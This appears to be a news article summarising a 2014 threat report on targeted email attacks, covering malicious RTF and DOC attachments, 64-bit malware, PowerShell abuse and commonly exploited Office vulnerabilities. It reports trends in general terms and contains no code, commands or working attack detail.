RTF and DOC Files Used in Majority of Targeted Attacks
Analysis of attack trends in 2014 reveals that tainted .RTF and .DOC files were employed in the majority of email-based targeted attacks, for a combined 46% of malicious doc types, according to a new study.
2014 also saw further refinements in targeted attack methodologies as more organizations have upgraded to newer versions of Windows, spawning an increase in the development of 64-bit malware.
“Examples of 64-bit malware include HAVEX, a remote access Trojan (RAT) used in a campaign that targeted industrial control systems (ICS), and WIPALL, the notorious malware behind the Sony Pictures hack,” the report states.
The move to newer versions of Windows has also increased the abuse of some tools and features in targeted attacks, most notably some malicious document templates and PowerShell for Windows 7 and higher, which is designed to allow system administrators to access other features without the use of graphical user interfaces (GUIs).
“PowerShell commands were abused to download malicious files and bypass execution policies, which allowed the downloaded files to be executed,” the researcher noted.
“A document exploit template, detected as TROJ_MDROP.TRX, was found in several targeted attacks. This exploit was most likely sold and distributed underground because of its use in several campaigns. Threat actors could simply modify the exploit template to fit their intended payload.”
The increase in the number of zero-day exploits used in targeted attacks also increased significantly in 2014, such as in the two Taidoor-related zero-day exploit attacks against CVE-2014-1761, which targeted government agencies and an educational institution in Taiwan.
“Exploiting new vulnerabilities has been proven to be more effective because security vendors have yet to create patches. Zero-day exploits can catch vendors and victims alike unawares,” the report said.
The leveraging of older, more well known vulnerabilities continued to be a factor as attackers rely on the use of “tried-and-tested” exploits, many of which are available for purchase in exploit kits on the black market.
CVE-2012-0158 remained the most exploited vulnerability used by targeted attacks in the first half of 2014 with two notable campaigns, PLEAD and Operation Pawn Storm, which was leveraged to infiltrate targeted Networks.